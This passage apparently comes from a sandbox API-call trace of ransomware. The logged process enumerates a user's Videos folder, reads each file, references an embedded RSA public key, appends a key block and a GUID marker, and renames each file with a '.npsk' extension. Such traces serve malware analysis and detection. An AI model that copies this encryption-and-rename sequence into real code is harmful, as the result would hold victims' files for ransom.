Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.812] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.812] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.813] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.813] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xbfb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.813] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.814] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.814] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.814] CloseHandle (hObject=0x61c) returned 1 [0215.819] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-xuO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-xuo.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-xuO.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-xuo.avi.npsk")) returned 1 [0215.821] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf27d00a0, ftCreationTime.dwHighDateTime=0x1d5da8d, ftLastAccessTime.dwLowDateTime=0x8957d160, ftLastAccessTime.dwHighDateTime=0x1d5e517, ftLastWriteTime.dwLowDateTime=0x8957d160, ftLastWriteTime.dwHighDateTime=0x1d5e517, nFileSizeHigh=0x0, nFileSizeLow=0x1796d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0DLodo3wtKgJ355.avi", cAlternateFileName="0DLODO~1.AVI")) returned 1 [0215.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DLodo3wtKgJ355.avi") returned=".avi" [0215.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DLodo3wtKgJ355.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dlodo3wtkgj355.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.831] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=96621) returned 1 [0215.831] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.833] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x17947, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.833] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.835] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1796d, lpOverlapped=0x0) returned 1 [0215.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.837] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.838] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.838] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.838] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.838] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.838] GetLastError () returned 0x0 [0215.838] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.838] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.838] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.838] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.839] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.840] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.841] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1796d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.841] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.841] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.841] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.841] CloseHandle (hObject=0x61c) returned 1 [0215.848] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DLodo3wtKgJ355.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dlodo3wtkgj355.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0DLodo3wtKgJ355.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0dlodo3wtkgj355.avi.npsk")) returned 1 [0215.850] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe8c40, ftCreationTime.dwHighDateTime=0x1d5de46, ftLastAccessTime.dwLowDateTime=0x80db2600, ftLastAccessTime.dwHighDateTime=0x1d5e057, ftLastWriteTime.dwLowDateTime=0x80db2600, ftLastWriteTime.dwHighDateTime=0x1d5e057, nFileSizeHigh=0x0, nFileSizeLow=0xa3c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1CDpY0.swf", cAlternateFileName="")) returned 1 [0215.850] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\1CDpY0.swf") returned=".swf" [0215.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\1CDpY0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\1cdpy0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.851] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=41925) returned 1 [0215.851] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.853] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa39f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.853] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.855] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa3c5, lpOverlapped=0x0) returned 1 [0215.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.856] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.857] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.857] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.857] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.857] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.857] GetLastError () returned 0x0 [0215.857] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.857] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.857] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.857] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.857] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.858] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.859] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa3c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.859] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.859] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.859] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.859] CloseHandle (hObject=0x61c) returned 1 [0215.867] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\1CDpY0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\1cdpy0.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\1CDpY0.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\1cdpy0.swf.npsk")) returned 1 [0215.872] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13706900, ftCreationTime.dwHighDateTime=0x1d5e5ab, ftLastAccessTime.dwLowDateTime=0x2f8058d0, ftLastAccessTime.dwHighDateTime=0x1d5de53, ftLastWriteTime.dwLowDateTime=0x2f8058d0, ftLastWriteTime.dwHighDateTime=0x1d5de53, nFileSizeHigh=0x0, nFileSizeLow=0xa495, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5Eo44I2cqs.swf", cAlternateFileName="5EO44I~1.SWF")) returned 1 [0215.872] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5Eo44I2cqs.swf") returned=".swf" [0215.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5Eo44I2cqs.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5eo44i2cqs.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.874] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=42133) returned 1 [0215.874] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.876] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa46f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.876] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.878] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa495, lpOverlapped=0x0) returned 1 [0215.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.879] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.880] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.880] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.880] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.880] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.880] GetLastError () returned 0x0 [0215.880] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.880] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.880] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.880] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.880] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.881] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.881] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa495, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.881] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.882] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.882] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.882] CloseHandle (hObject=0x61c) returned 1 [0215.887] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5Eo44I2cqs.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5eo44i2cqs.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5Eo44I2cqs.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5eo44i2cqs.swf.npsk")) returned 1 [0215.889] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e154d0, ftCreationTime.dwHighDateTime=0x1d5d9b3, ftLastAccessTime.dwLowDateTime=0x18580aa0, ftLastAccessTime.dwHighDateTime=0x1d5dab0, ftLastWriteTime.dwLowDateTime=0x18580aa0, ftLastWriteTime.dwHighDateTime=0x1d5dab0, nFileSizeHigh=0x0, nFileSizeLow=0xc5b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60CV9tu.mp4", cAlternateFileName="")) returned 1 [0215.889] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\60CV9tu.mp4") returned=".mp4" [0215.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\60CV9tu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\60cv9tu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.892] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=50616) returned 1 [0215.892] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.894] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc592, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.898] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.900] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc5b8, lpOverlapped=0x0) returned 1 [0215.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.901] lstrlenA (lpString="-----BEGIN PUBLIC 